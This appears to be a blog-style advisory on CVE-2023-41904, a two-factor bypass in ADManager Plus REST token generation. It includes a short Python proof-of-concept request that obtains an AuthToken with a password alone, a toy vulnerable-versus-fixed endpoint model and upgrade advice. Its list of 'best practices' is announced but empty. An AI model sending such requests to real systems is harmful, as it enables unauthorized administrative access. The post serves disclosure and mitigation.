A recent vulnerability, known as CVE-2023-41904, has been discovered in Zoho ManageEngine ADManager Plus, a popular web-based Active Directory management and reporting solution. This vulnerability allows an attacker to bypass the two-factor authentication (2FA) process in the REST APIs for AuthToken generation and potentially gain unauthorized access to sensitive information. This post will provide a detailed explanation of the exploit and how to mitigate it.

Vulnerability Details

CVE-2023-41904 affects Zoho ManageEngine ADManager Plus versions before 7203 and lies in the 2FA process. Because the REST APIs are used for administrative tasks and for automation, this vulnerability allows an attacker with valid credentials to bypass 2FA and obtain an AuthToken without completing the 2FA process.

Here's a code snippet demonstrating how this exploit works:

import requests

# REST API AuthToken endpoint of the target instance
url = "https://example.com/rest-api/authenticate"

# Valid credentials only; no second factor is sent
payload = {
    "username": "attacker",
    "password": "attacker_password"
}

headers = {
    "Content-Type": "application/json"
}

response = requests.post(url, headers=headers, json=payload)

if response.status_code == 200:
    # On unpatched versions the token comes back after the password check alone
    auth_token = response.json().get("AuthToken")
    print("Successfully bypassed 2FA and generated AuthToken:", auth_token)
else:
    print("Failed to authenticate")

In this example, the attacker sends a POST request to the "/rest-api/authenticate" endpoint with their username and password. If the authentication is successful, the server responds with the AuthToken without requiring the user to provide a second factor of authentication, effectively bypassing the 2FA mechanism in place.
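The same flaw class in miniature, as an added example that is not Zoho's code and not the snippet above: a toy REST token endpoint that issues an AuthToken on the password alone, next to the version that enforces the second factor for enrolled users. The user store, plaintext passwords and the fixed "currently valid" TOTP code are constructed stand-ins for a real directory and a real TOTP check.

```python
import hmac
import secrets
from dataclasses import dataclass
from typing import Optional


@dataclass
class User:
    name: str
    password: str                    # plaintext only in this toy model
    totp_enrolled: bool
    totp_code: Optional[str] = None  # stand-in for the code a real TOTP check would accept


# Constructed sample accounts: "alice" is enrolled in 2FA, "svc" is not.
USERS = {
    "alice": User("alice", "alice-pw", True, "123456"),
    "svc": User("svc", "svc-pw", False),
}


def password_ok(user: User, password: str) -> bool:
    return hmac.compare_digest(user.password, password)


def rest_authenticate_vulnerable(username: str, password: str) -> Optional[dict]:
    """Models the pre-7203 behaviour: the REST path issues an AuthToken on the password alone."""
    user = USERS.get(username)
    if user is None or not password_ok(user, password):
        return None
    # No second-factor check on this code path, so an enrolled user still gets a token.
    return {"AuthToken": secrets.token_hex(16)}


def rest_authenticate_fixed(username: str, password: str,
                            totp: Optional[str] = None) -> Optional[dict]:
    """Same endpoint with 2FA enforced: an enrolled user gets no token without a valid code."""
    user = USERS.get(username)
    if user is None or not password_ok(user, password):
        return None
    if user.totp_enrolled and (totp is None or not hmac.compare_digest(user.totp_code, totp)):
        # The second factor is verified on the REST path too, so there is nothing to bypass.
        return {"error": "second factor required"}
    return {"AuthToken": secrets.token_hex(16)}
```

The fix is structural: every path that mints a token must run through the same second-factor check, rather than the UI login enforcing it while the API path skips it.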

Original References

1. CVE-2023-41904: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41904

2. Zoho Security Advisory: https://www.manageengine.com/products/ad-manager/admanager-plus-security-update.html

Mitigation

To mitigate the CVE-2023-41904 vulnerability, users need to upgrade their Zoho ManageEngine ADManager Plus installations to version 7203 or later. Taking this action ensures that 2FA is properly enforced in the REST APIs and prevents this unauthorized access.

Additionally, organizations are advised to follow best practices for securing their REST APIs, such as:

Conclusion

CVE-2023-41904 is a critical vulnerability that allows an attacker to bypass two-factor authentication in REST APIs for AuthToken generation in Zoho ManageEngine ADManager Plus. By upgrading to the latest version and following security best practices, organizations can mitigate the risk and secure their environments.

Timeline

Published on: 09/27/2023 15:19:00 UTC
Last modified on: 09/28/2023 17:41:00 UTC